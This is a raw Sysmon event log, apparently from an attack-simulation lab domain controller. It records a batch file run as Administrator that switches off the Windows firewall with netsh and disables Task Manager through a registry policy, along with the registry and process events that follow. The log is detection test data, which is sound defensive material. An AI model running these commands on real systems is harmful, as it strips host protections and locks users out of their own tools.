12:04:39.442{266CAFBE-6557-6064-3401-00000000AE01}6180C:\Windows\system32\reg.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgrDWORD (0x00000001) 10341000x80000000000000009348Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.442{266CAFBE-6556-6064-2601-00000000AE01}12645496C:\Windows\system32\conhost.exe{266CAFBE-6557-6064-3401-00000000AE01}6180C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009347Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.427{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009346Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.427{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009345Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.427{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009344Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.427{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009343Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.427{266CAFBE-64C1-6064-9100-00000000AE01}51083828C:\Windows\system32\csrss.exe{266CAFBE-6557-6064-3401-00000000AE01}6180C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000009342Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.427{266CAFBE-6556-6064-2501-00000000AE01}14802428C:\Windows\system32\cmd.exe{266CAFBE-6557-6064-3401-00000000AE01}6180C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+8ad9|C:\Windows\system32\cmd.exe+6fdd|C:\Windows\system32\cmd.exe+11a9e|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000009341Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.441{266CAFBE-6557-6064-3401-00000000AE01}6180C:\Windows\System32\reg.exe10.0.14393.0 (rs1_release.160715-1616)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system" /v "DisableTaskMgr" /t REG_DWORD /d "1" /fC:\Temp\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282HighMD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD,IMPHASH=EE7EB7FA7D163340753B7223ADA14352{266CAFBE-6556-6064-2501-00000000AE01}1480C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Temp\1.bat" " 13241300x80000000000000009340Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:04:39.427{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Epoch\EpochDWORD (0x0000061b) 13241300x80000000000000009339Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:04:39.411{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\BFE\Parameters\Policy\Options\EnablePacketQueueDWORD (0x00000000) 13241300x80000000000000009338Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localT1089SetValue2021-03-31 12:04:39.411{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\EnableFirewallDWORD (0x00000000) 10341000x80000000000000009337Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.411{266CAFBE-646C-6064-1600-00000000AE01}15841864C:\Windows\system32\svchost.exe{266CAFBE-6557-6064-3301-00000000AE01}5420C:\Windows\system32\netsh.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\fwbase.dll+1594|c:\windows\system32\fwbase.dll+13f6|c:\windows\system32\mpssvc.dll+6edd7|c:\windows\system32\mpssvc.dll+8bf86|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009336Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.411{266CAFBE-646C-6064-1000-00000000AE01}11242272C:\Windows\system32\svchost.exe{266CAFBE-6557-6064-3301-00000000AE01}5420C:\Windows\system32\netsh.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009335Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.411{266CAFBE-646C-6064-1000-00000000AE01}11241624C:\Windows\system32\svchost.exe{266CAFBE-6557-6064-3301-00000000AE01}5420C:\Windows\system32\netsh.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 13241300x80000000000000009334Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localT1031,T1050SetValue2021-03-31 12:04:39.380{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\IKEEXT\StartDWORD (0x00000002) 10341000x80000000000000009333Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.380{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009332Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.380{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009331Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.364{266CAFBE-6556-6064-2601-00000000AE01}12645496C:\Windows\system32\conhost.exe{266CAFBE-6557-6064-3301-00000000AE01}5420C:\Windows\system32\netsh.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009330Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.364{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009329Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.364{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009328Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.364{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009327Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.364{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009326Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.364{266CAFBE-64C1-6064-9100-00000000AE01}51084328C:\Windows\system32\csrss.exe{266CAFBE-6557-6064-3301-00000000AE01}5420C:\Windows\system32\netsh.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000009325Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.364{266CAFBE-6556-6064-2501-00000000AE01}14802428C:\Windows\system32\cmd.exe{266CAFBE-6557-6064-3301-00000000AE01}5420C:\Windows\system32\netsh.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+8ad9|C:\Windows\system32\cmd.exe+6fdd|C:\Windows\system32\cmd.exe+11a9e|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000009324Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.376{266CAFBE-6557-6064-3301-00000000AE01}5420C:\Windows\System32\netsh.exe10.0.14393.0 (rs1_release.160715-1616)Network Command ShellMicrosoft® Windows® Operating SystemMicrosoft Corporationnetsh.exenetsh advfirewall set currentprofile state offC:\Temp\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282HighMD5=4D51BCD0B94D09F5DFB80DF754D31E28,SHA256=E5888E649C881E4BBBCE472F6808F93B2B5564D3094995A5A08E66B2406C1607,IMPHASH=51DC8B92EF1620527201E5276E21BCA7{266CAFBE-6556-6064-2501-00000000AE01}1480C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Temp\1.bat" " 17141700x80000000000000009323Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-CreatePipe2021-03-31 12:04:39.364{266CAFBE-646D-6064-1800-00000000AE01}2092\Winsock2\CatalogChangeListener-82c-0C:\Windows\system32\svchost.exe 13241300x80000000000000009322Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:04:39.349{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Epoch\EpochDWORD (0x0000061a) 13241300x80000000000000009321Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:04:39.349{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\BFE\Parameters\Policy\Options\EnablePacketQueueDWORD (0x00000000) 13241300x80000000000000009320Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localT1089SetValue2021-03-31 12:04:39.349{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\DoNotAllowExceptionsDWORD (0x00000000) 10341000x80000000000000009319Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.349{266CAFBE-646C-6064-1600-00000000AE01}15843848C:\Windows\system32\svchost.exe{266CAFBE-6556-6064-3201-00000000AE01}5092C:\Windows\system32\netsh.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\fwbase.dll+1594|c:\windows\system32\fwbase.dll+13f6|c:\windows\system32\mpssvc.dll+6edd7|c:\windows\system32\mpssvc.dll+8bf86|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 13241300x80000000000000009318Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:04:39.349{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Epoch\EpochDWORD (0x00000619) 12241200x80000000000000009317Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-DeleteValue2021-03-31 12:04:39.333{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\BFE\Parameters\Policy\BootTime\Filter\{941dad9d-7b1a-4354-997b-00cf1aa9b35c} 12241200x80000000000000009316Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-DeleteValue2021-03-31 12:04:39.333{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\BFE\Parameters\Policy\BootTime\Filter\{935b7f48-0ede-44dd-9bc2-e00bb635cda3} 12241200x80000000000000009315Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-DeleteValue2021-03-31 12:04:39.333{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\BFE\Parameters\Policy\BootTime\Filter\{c42f1cd6-3a95-4ae2-a513-793c3ae610c7} 12241200x80000000000000009314Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-DeleteValue2021-03-31 12:04:39.333{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\BFE\Parameters\Policy\BootTime\Filter\{2db25e6c-f07a-44f4-b6c8-50a330d2790b} 12241200x80000000000000009313Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-DeleteValue2021-03-31 12:04:39.333{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\BFE\Parameters\Policy\BootTime\Filter\{2dd96961-5757-434f-b617-34e732517c0e} 12241200x80000000000000009312Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-DeleteValue2021-03-31 12:04:39.333{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\BFE\Parameters\Policy\BootTime\Filter\{0ccc96a3-8c5c-45e2-b80e-7e37b16cc1ad} 12241200x80000000000000009311Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-DeleteValue2021-03-31 12:04:39.333{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\BFE\Parameters\Policy\BootTime\Filter\{a47525e2-725b-4888-8af1-ba5a60c04f4d} 12241200x80000000000000009310Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-DeleteValue2021-03-31 12:04:39.333{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\BFE\Parameters\Policy\BootTime\Filter\{c016105c-eb34-4519-a5fd-5f4e4ad4d18e} 12241200x80000000000000009309Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-DeleteValue2021-03-31 12:04:39.333{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\BFE\Parameters\Policy\BootTime\Filter\{074f7f68-ee10-428a-89d1-ba78f6c327ca} 12241200x80000000000000009308Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-DeleteValue2021-03-31 12:04:39.333{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\BFE\Parameters\Policy\BootTime\Filter\{0c3be01b-fe70-4cc4-89dc-c07996b67e6d} 12241200x80000000000000009307Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-DeleteValue2021-03-31 12:04:39.333{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\BFE\Parameters\Policy\BootTime\Filter\{c970a45d-57f9-4e32-a5bd-886a9662641e} 12241200x80000000000000009306Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-DeleteValue2021-03-31 12:04:39.333{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\BFE\Parameters\Policy\BootTime\Filter\{12c38916-82ac-4737-8f38-b6957ffebad6} 12241200x80000000000000009305Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-DeleteValue2021-03-31 